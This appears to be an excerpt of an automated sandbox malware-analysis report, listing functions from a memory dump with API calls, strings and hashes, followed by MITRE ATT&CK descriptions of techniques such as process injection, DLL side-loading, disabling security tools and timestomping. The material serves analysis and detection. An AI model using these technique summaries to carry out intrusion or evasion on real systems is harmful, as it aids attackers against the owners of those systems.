Uniqueness Score: -1.00%

Function 6CF48F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(835FE394,835FE394,?,00000000), ref: 6CF48F7F
GetLastError.KERNEL32(0000000A,?,00000000), ref: 6CF48F8F

Part of subcall function 6CEE4010: std::_Xinvalid_argument.LIBCPMT ref: 6CEE402A

__CxxThrowException@8.LIBCMT ref: 6CF49014

Part of subcall function 6CF4AC75: RaiseException.KERNEL32(?,?,6CF49C34,835FE394,?,?,?,?,6CF49C34,835FE394,6CF79C90,6CF8B974,835FE394), ref: 6CF4ACB7

Strings

Timer: QueryPerformanceCounter failed with error , xrefs: 6CF48FA5

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceCounter failed with error
API String ID: 1823523280-4075696077
Opcode ID: 817103c595f038d92942fea204c2a9e8feec4c8ada02a400d27c91d2641c4613
Instruction ID: e79a8273552ee1eb8fad881345199393f4c20ea7950b5f6f61fcec646a26419e
Opcode Fuzzy Hash: 817103c595f038d92942fea204c2a9e8feec4c8ada02a400d27c91d2641c4613
Instruction Fuzzy Hash: B92141B1508380AFD310DF25C841B9BBBF8FB89618F508E1DF5A593781DB3595088B93

Uniqueness

Uniqueness Score: -1.00%

Function 6CF16480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CF16518

Part of subcall function 6CF4AC75: RaiseException.KERNEL32(?,?,6CF49C34,835FE394,?,?,?,?,6CF49C34,835FE394,6CF79C90,6CF8B974,835FE394), ref: 6CF4ACB7

__CxxThrowException@8.LIBCMT ref: 6CF16558

Strings

Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6CF164E7
Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6CF16527

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 3476068407-3345525433
Opcode ID: 552b50210ec67c5dd80bd868d3a51138ff47863006235fd68c150a7748be55e1
Instruction ID: 9b4dc0f15f87e69f75c5835cb5817af113ad126a90f893755ec028eb3a7c086f
Opcode Fuzzy Hash: 552b50210ec67c5dd80bd868d3a51138ff47863006235fd68c150a7748be55e1
Instruction Fuzzy Hash: AD21C07251C3809EC724DF64C840FDAB7F8AB49648F508A1DF589D2E45EB76D408CA63

Uniqueness

Uniqueness Score: -1.00%

Function 6CF225D0 Relevance: 6.2, APIs: 4, Instructions: 206COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CF22677
_memmove.LIBCMT ref: 6CF226E6
_memmove.LIBCMT ref: 6CF22746
__CxxThrowException@8.LIBCMT ref: 6CF227CD

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID:
API String ID: 2655171816-0
Opcode ID: c2f37260d0768b6c872ca978770e275d4f73d32d916c346309cbc4da9cb839ee
Instruction ID: b10a4f2f85c678aed5feb23a39ee7c840b590662935038a7961a11d1152125b4
Opcode Fuzzy Hash: c2f37260d0768b6c872ca978770e275d4f73d32d916c346309cbc4da9cb839ee
Instruction Fuzzy Hash: 665191763187058FD704DFA8C994E2FB7E9AFC8614F10492DE495C3741EB3AE9058B92

Uniqueness

Uniqueness Score: -1.00%

Function 6CF42B80 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

Part of subcall function 6CF16480: __CxxThrowException@8.LIBCMT ref: 6CF16518
Part of subcall function 6CF16480: __CxxThrowException@8.LIBCMT ref: 6CF16558

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

std::exception::exception.LIBCMT ref: 6CF42C9A
__CxxThrowException@8.LIBCMT ref: 6CF42CB1
std::exception::exception.LIBCMT ref: 6CF42CC3
__CxxThrowException@8.LIBCMT ref: 6CF42CDA

Part of subcall function 6CF49BB5: std::exception::exception.LIBCMT ref: 6CF49C04
Part of subcall function 6CF49BB5: std::exception::exception.LIBCMT ref: 6CF49C1E
Part of subcall function 6CF49BB5: __CxxThrowException@8.LIBCMT ref: 6CF49C2F

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$_malloc
String ID:
API String ID: 3942750879-0
Opcode ID: bfe6d39074ad068ef4b88b23df68b8542e384eae24c575553c8cc181ebbf244b
Instruction ID: 26dd4121acda9b10387e568d7d88844d08dbfb635d6781229e926870f23596b8
Opcode Fuzzy Hash: bfe6d39074ad068ef4b88b23df68b8542e384eae24c575553c8cc181ebbf244b
Instruction Fuzzy Hash: B24128B15187419FC314CF59C480A8AFFF4FF99714F508A2EE19A87B51D7B1A508CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CF588C9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6CF588FD
__isleadbyte_l.LIBCMT ref: 6CF58930
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6CF58961
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6CF589CF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: ab6976032292789fc6f01357cc1faf0d0ed3e10c67ac4bc461077f797e6753cb
Instruction ID: ed42255ac7d4d845527819e2f00a5a0d0f46cda79289434bc4e54dd14e4f2b72
Opcode Fuzzy Hash: ab6976032292789fc6f01357cc1faf0d0ed3e10c67ac4bc461077f797e6753cb
Instruction Fuzzy Hash: C5310871A65386EFDB00DFA8C880EAE3FB4FF02315F54456AE2A49B591D330D960DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF8470 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

InitializeCriticalSection.KERNEL32(00000000,00000000,6CEF5D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6CEF84EA
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6CEF84F0
std::exception::exception.LIBCMT ref: 6CEF853C
__CxxThrowException@8.LIBCMT ref: 6CEF8551

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 3005353045-0
Opcode ID: 6d1f3c868ef44a7bb5d11c868138a88369f9993eba83213ddc8321537516df63
Instruction ID: 83920adf622a6549ceaa19220ae31afb8b54326465fcd9143599fb31d244f8fd
Opcode Fuzzy Hash: 6d1f3c868ef44a7bb5d11c868138a88369f9993eba83213ddc8321537516df63
Instruction Fuzzy Hash: D1317C71A01704AFCB10CF69C480A9AFBF8FF09214F508A6EE95687B41D770FA04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CF50A60 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6CF50A86

Part of subcall function 6CF508B2: __fltout2.LIBCMT ref: 6CF508DD

__cftog_l.LIBCMT ref: 6CF50AAC
__cftoe_l.LIBCMT ref: 6CF50ADE

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: b970b5d81c883e2bb13ac2b2d68c6c65d04fac3a6cb425a4a50156e7c138723e
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: AC117B3700018ABBCF165E84DC11CEE3F22BB29358B998516FF2859931C776C6B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 6CF48970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6CF48A84
_memmove.LIBCMT ref: 6CF48AA0

Strings

EncodingParameters, xrefs: 6CF48A41

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: _memmove_memset
String ID: EncodingParameters
API String ID: 3555123492-55378216
Opcode ID: bae781e071415680e75b165eea98dfddb9484fba83ca83402688e9f9c61ad305
Instruction ID: 85f799be907e5cd1cbc210c722f2f809c2031ee8eb14a8170c959ebbed716099
Opcode Fuzzy Hash: bae781e071415680e75b165eea98dfddb9484fba83ca83402688e9f9c61ad305
Instruction Fuzzy Hash: 396102B46083419FD304CF69C880A2AFBE9AFC9754F148A1DF59987391D770E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CF14D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 6CEE4010: std::_Xinvalid_argument.LIBCPMT ref: 6CEE402A

__CxxThrowException@8.LIBCMT ref: 6CF14E00

Part of subcall function 6CF4AC75: RaiseException.KERNEL32(?,?,6CF49C34,835FE394,?,?,?,?,6CF49C34,835FE394,6CF79C90,6CF8B974,835FE394), ref: 6CF4ACB7

Strings

ArraySink: missing OutputBuffer argument, xrefs: 6CF14D91
OutputBuffer, xrefs: 6CF14D77

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
API String ID: 3718517217-3781944848
Opcode ID: f3afa871b5c04f52ba59ce021ef0227b770aed9b9d5dbed3d80c521ffa9f86bc
Instruction ID: edab9b363c06327a750bade090d1eb11cbbfa7019e8c8a0b29a1114e20c73295
Opcode Fuzzy Hash: f3afa871b5c04f52ba59ce021ef0227b770aed9b9d5dbed3d80c521ffa9f86bc
Instruction Fuzzy Hash: 823147B55083809FC310CF69C490A9BBBF4BB99714F508E2EF5A583B51DB75D908CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CF1ACA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CF1ACF8

Strings

Modulus, xrefs: 6CF1AD30
PublicExponent, xrefs: 6CF1AD1F

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: 0eabf8a1be00062086f2b7d7f1e33043c91e7ad04f8736e36189bbb436f75a7e
Instruction ID: d03098dcfb973379d3565d8ca43c9293ec5aae19b9d7163c5f52bd3b766bc964
Opcode Fuzzy Hash: 0eabf8a1be00062086f2b7d7f1e33043c91e7ad04f8736e36189bbb436f75a7e
Instruction Fuzzy Hash: CC11CE71A183049EC200DF29894058BBBE4AFD6668F00461EF4856BF60EB31D98CCBD2

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

